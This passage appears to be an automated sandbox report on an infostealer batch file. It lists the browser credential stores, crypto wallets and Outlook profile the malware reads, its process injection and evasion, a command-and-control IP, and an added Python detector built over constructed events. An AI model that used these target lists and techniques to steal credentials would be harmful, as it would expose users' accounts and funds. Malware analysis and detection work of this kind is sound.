              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\PING.EXE | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: PING.EXE, 0000000A.00000002.2192781246.000000000317D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: PING.EXE PID: 7696, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PING.EXE PID: 7032, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PING.EXE PID: 7696, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PING.EXE PID: 7032, type: MEMORYSTR
Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: bhmlbgebokamljgnceonbncdofmmkedg1Electrum
Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Qtum wallets!DashCore"Dash#Litecoin$Bitcoin%Dogecoin)Armory*Bytecoin+bytecoin,MultiBit.exodus.wallet/Ethereum0keystore2ElectrumLTC3Electrum-LTC4AtomicWallet5atomic9WalletWasabi:Client;Wallets<ElectronCash=Sparrow>IOCoin?PPCoin@BBQCoinAMincoinBDevCoinCdevcoinDYACoinEFrankoFFreiCoinGInfiniteCoinHInfinitecoinIGoldCoinGLDJGoldCoin (GLD)KBinanceLTerracoinMDaedalusMainnetNDaedalus MainnetOMyMoneroPMyCryptoQBisqRbtc_mainnetSwalletTBisq_dbUdbVBisq_keysWkeysXZapYSimpleosZsimpleos[Neon\storage]bitmonero_lmdb`EtherwallcElectrum_configeElectrumLTC_configfWalletWasabi_configgConfig.jsonhElectronCash_configiSparrow_configjAtomicDEXkatomic_qtlBinance_wallet_config
Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Qtum wallets!DashCore"Dash#Litecoin$Bitcoin%Dogecoin)Armory*Bytecoin+bytecoin,MultiBit.exodus.wallet/Ethereum0keystore2ElectrumLTC3Electrum-LTC4AtomicWallet5atomic9WalletWasabi:Client;Wallets<ElectronCash=Sparrow>IOCoin?PPCoin@BBQCoinAMincoinBDevCoinCdevcoinDYACoinEFrankoFFreiCoinGInfiniteCoinHInfinitecoinIGoldCoinGLDJGoldCoin (GLD)KBinanceLTerracoinMDaedalusMainnetNDaedalus MainnetOMyMoneroPMyCryptoQBisqRbtc_mainnetSwalletTBisq_dbUdbVBisq_keysWkeysXZapYSimpleosZsimpleos[Neon\storage]bitmonero_lmdb`EtherwallcElectrum_configeElectrumLTC_configfWalletWasabi_configgConfig.jsonhElectronCash_configiSparrow_configjAtomicDEXkatomic_qtlBinance_wallet_config
Source: explorer.exe, 00000006.00000002.2931598954.000000000AB0D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: metroexodus.exe
Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\configigfig\Config.json
Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Qtum wallets!DashCore"Dash#Litecoin$Bitcoin%Dogecoin)Armory*Bytecoin+bytecoin,MultiBit.exodus.wallet/Ethereum0keystore2ElectrumLTC3Electrum-LTC4AtomicWallet5atomic9WalletWasabi:Client;Wallets<ElectronCash=Sparrow>IOCoin?PPCoin@BBQCoinAMincoinBDevCoinCdevcoinDYACoinEFrankoFFreiCoinGInfiniteCoinHInfinitecoinIGoldCoinGLDJGoldCoin (GLD)KBinanceLTerracoinMDaedalusMainnetNDaedalus MainnetOMyMoneroPMyCryptoQBisqRbtc_mainnetSwalletTBisq_dbUdbVBisq_keysWkeysXZapYSimpleosZsimpleos[Neon\storage]bitmonero_lmdb`EtherwallcElectrum_configeElectrumLTC_configfWalletWasabi_configgConfig.jsonhElectronCash_configiSparrow_configjAtomicDEXkatomic_qtlBinance_wallet_config
Source: powershell.exe, 00000002.00000002.2250685497.00007FFD9BC60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txt
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txt
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txt
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txt
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txt
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\PING.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txt
Source: C:\Windows\SysWOW64\PING.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PING.EXE PID: 7032, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PING.EXE PID: 7696, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: PING.EXE PID: 7696, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PING.EXE PID: 7032, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PING.EXE PID: 7696, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PING.EXE PID: 7032, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques are listed per tactic column. A number in front of a technique name is the report's signature-count badge for that technique; techniques without a badge are the standard rows of the matrix that no signature matched in this analysis.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 41 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 3 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 11 Scripting; 1 DLL Side-Loading; 2 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 312 Process Injection; 2 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 41 Virtualization/Sandbox Evasion; 312 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 File and Directory Discovery; 34 System Information Discovery; 141 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph

Behavior Graph ID: 1629935 | Sample: email.bat | Start date: 05/03/2025 | Architecture: WINDOWS | Score: 100

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Process tree as drawn in the graph (graph node number in brackets; the numbers after a process name are the graph's created-registry-value / created-file count badges, kept as shown):

email.bat [2] | DNS: 34.26.8.0.in-addr.arpa | Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Generic Stealer; 18 other signatures
  cmd.exe 1 [13], started | Signatures: Suspicious powershell command line found; Encrypted powershell cmdline option found; Uses ping.exe to check the status of other devices and networks; PowerShell case anomaly found
    powershell.exe 38 [16], started | Dropped: C:\Users\user\AppData\...\mlbsu2za.cmdline (Unicode); C:\Users\user\AppData\Local\Phantom.ps1 (ASCII) | Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Creates a thread in another existing process (thread injection)
      explorer.exe 46 3 [22], injected | Dropped: C:\Users\user\...\DkkijTOJSHGJxxcmgeA.bat (ASCII) | Signatures: Drops script or batch files to the startup folder; Found many strings related to Crypto-Wallets (likely being stolen)
        cmd.exe 1 [32], started | Signatures: Encrypted powershell cmdline option found; PowerShell case anomaly found
          powershell.exe 12 [44], started
            powershell.exe [48], started | Signatures: Writes to foreign memory regions; Creates a thread in another existing process (thread injection)
              cmd.exe [53], started
                PING.EXE [60], started | Signatures: Tries to harvest and steal browser information (history, passwords, etc)
                conhost.exe [63], started
              csc.exe [55], started | Dropped: C:\Users\user\AppData\Local\...\zozwmnym.dll (PE32)
                cvtres.exe [65], started
              taskkill.exe [58], started
            conhost.exe [51], started
          conhost.exe [46], started
      cmd.exe 1 [26], started
        PING.EXE 4 [35], started | Network: 127.0.0.1 unknown unknown; 213.209.150.200, 49734, 49735, 49737 KEMINETAL Germany | Signatures: Tries to steal Mail credentials (via file / registry access); Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Tries to harvest and steal browser information (history, passwords, etc)
        conhost.exe [38], started
      csc.exe 3 [28], started | Dropped: C:\Users\user\AppData\Local\...\fhrgxrvn.dll (PE32)
        cvtres.exe 1 [40], started
      3 other processes [30] | Dropped: C:\Users\user\AppData\Local\...\mlbsu2za.dll (PE32)
        cvtres.exe 1 [42], started
    conhost.exe [20], started
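The chain the graph and the "Stealing of Sensitive Information" entries describe is detectable from ordinary host telemetry without any of the sample's hashes: cmd.exe launches a case-mangled PowerShell with an encoded command, PowerShell compiles C# through csc.exe and injects into other processes, and a PING.EXE instance then opens browser credential stores, reads the Outlook profile key, queries root\SecurityCenter2 for AV products and connects to 213.209.150.200. The following correlator is an added example, not part of the Joe Sandbox report: it runs over constructed Sysmon-style events (the event schema, field names, the two benign control processes and the decoded payload are assumptions made for the example; the paths, registry key, WMI query and IP are the ones the report lists) and emits one finding per rule, each annotated with the process ancestry and whether an encoded-PowerShell ancestor exists.

```python
"""Added example (not from the Joe Sandbox report): correlate Sysmon-style host
events into the detections this report's signatures describe. The event schema,
field names and every entry in SAMPLE_EVENTS are constructed for this example."""
import base64
import ipaddress
import re

# Browser credential/history stores named in the report's "File opened" lines.
BROWSER_STORES = ("\\login data", "\\web data", "\\cookies", "\\history",
                  "\\key4.db", "\\cookies.sqlite", "\\places.sqlite")
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}  # legitimate readers
OUTLOOK_PROFILE_KEY = "\\windows messaging subsystem\\profiles\\outlook\\"
CANONICAL_PS = {"powershell", "powershell.exe", "PowerShell", "PowerShell.exe",
                "Powershell", "Powershell.exe", "POWERSHELL", "POWERSHELL.EXE"}


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def encoded_payload(cmdline):
    """Return the decoded -EncodedCommand payload, or None. powershell.exe accepts any
    prefix of -EncodedCommand (-e, -ec, -enc, ...) in any letter case, so the whole
    switch family is matched rather than one fixed spelling."""
    for m in re.finditer(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{8,})", cmdline):
        switch, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(switch):
            continue
        try:  # the payload is base64 over UTF-16LE text
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def case_anomaly(cmdline):
    """True when the powershell token is spelled with casing no human or installer
    produces (e.g. PoWeRsHeLl), the report's 'PowerShell case anomaly'."""
    tokens = cmdline.split()
    if not tokens:
        return False
    first = tokens[0].strip('"').rsplit("\\", 1)[-1]
    return first.lower() in ("powershell", "powershell.exe") and first not in CANONICAL_PS


def is_external(ip):
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local)


def ancestry(procs, pid):
    """Walk pid -> ppid through the process table; stops at an unknown parent."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = procs[pid]["ppid"]
    return chain


def analyze(events):
    procs = {e["pid"]: e for e in events if e["type"] == "process_create"}
    findings = []

    def report(rule, pid, detail):
        chain = ancestry(procs, pid)
        findings.append({
            "rule": rule, "pid": pid, "detail": detail,
            "chain": " <- ".join(image_name(procs[p]["image"]) for p in chain),
            # Is this process, or anything above it, an encoded PowerShell?
            "under_encoded_powershell": any(
                image_name(procs[p]["image"]) == "powershell.exe"
                and encoded_payload(procs[p]["cmdline"]) is not None for p in chain)})

    for ev in events:
        pid, t = ev["pid"], ev["type"]
        img = image_name(procs[pid]["image"]) if pid in procs else ""
        if t == "process_create":
            if img == "powershell.exe":
                payload = encoded_payload(ev["cmdline"])
                if payload is not None:
                    report("encoded_powershell", pid, payload)
                if case_anomaly(ev["cmdline"]):
                    report("powershell_case_anomaly", pid, ev["cmdline"].split()[0])
            parent = procs.get(ev["ppid"])
            if img == "csc.exe" and parent and image_name(parent["image"]) == "powershell.exe":
                report("powershell_compiles_csharp", pid, ev["cmdline"])
        elif t == "file_open" and img not in BROWSER_IMAGES \
                and any(ev["path"].lower().endswith(s) for s in BROWSER_STORES):
            report("nonbrowser_reads_browser_store", pid, ev["path"])
        elif t == "reg_open" and OUTLOOK_PROFILE_KEY in ev["key"].lower() and img != "outlook.exe":
            report("outlook_profile_read", pid, ev["key"])
        elif t == "wmi_query" and "securitycenter2" in ev["query"].lower() \
                and "antivirusproduct" in ev["query"].lower():
            report("av_discovery_wmi", pid, ev["query"])
        elif t == "net_connect" and img == "ping.exe" and is_external(ev["dst_ip"]):
            report("ping_exe_external_tcp", pid, ev["dst_ip"])  # ping speaks ICMP, not TCP
    return findings


# Constructed sample mirroring the report's chain cmd.exe -> powershell.exe -> cmd.exe ->
# PING.EXE, plus two benign control processes (pid 90, 91) that must not fire.
CONSTRUCTED_ENCODED = base64.b64encode("Write-Output 'constructed payload'".encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 13, "ppid": 2, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c email.bat"},
    {"type": "process_create", "pid": 16, "ppid": 13, "image": PS, "cmdline": "PoWeRsHeLl -NoP -w HiDdEn -eNc " + CONSTRUCTED_ENCODED},
    {"type": "process_create", "pid": 28, "ppid": 16, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\example.cmdline"'},
    {"type": "process_create", "pid": 26, "ppid": 16, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c ping 127.0.0.1"},
    {"type": "process_create", "pid": 35, "ppid": 26, "image": r"C:\Windows\SysWOW64\PING.EXE", "cmdline": "ping 127.0.0.1"},
    {"type": "file_open", "pid": 35, "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file_open", "pid": 35, "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db"},
    {"type": "reg_open", "pid": 35, "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"type": "wmi_query", "pid": 35, "query": r"root\SecurityCenter2 : Select * from AntivirusProduct"},
    {"type": "net_connect", "pid": 35, "dst_ip": "127.0.0.1"},
    {"type": "net_connect", "pid": 35, "dst_ip": "213.209.150.200"},
    {"type": "process_create", "pid": 90, "ppid": 1, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmdline": "chrome.exe"},
    {"type": "file_open", "pid": 90, "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "process_create", "pid": 91, "ppid": 1, "image": PS, "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['rule']:32} pid={f['pid']:<4} {f['chain']}")
```

Each rule here is one signature from the report restated as a host-telemetry condition; the ancestry annotation is what turns several medium-confidence hits (an encoded PowerShell alone is common in administration) into one high-confidence chain when they all sit under the same encoded PowerShell. Note that matching the -EncodedCommand switch family rather than the literal string is what keeps `-eNc`, `-e` and `-EncodedComman` from slipping past a fixed-string rule.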
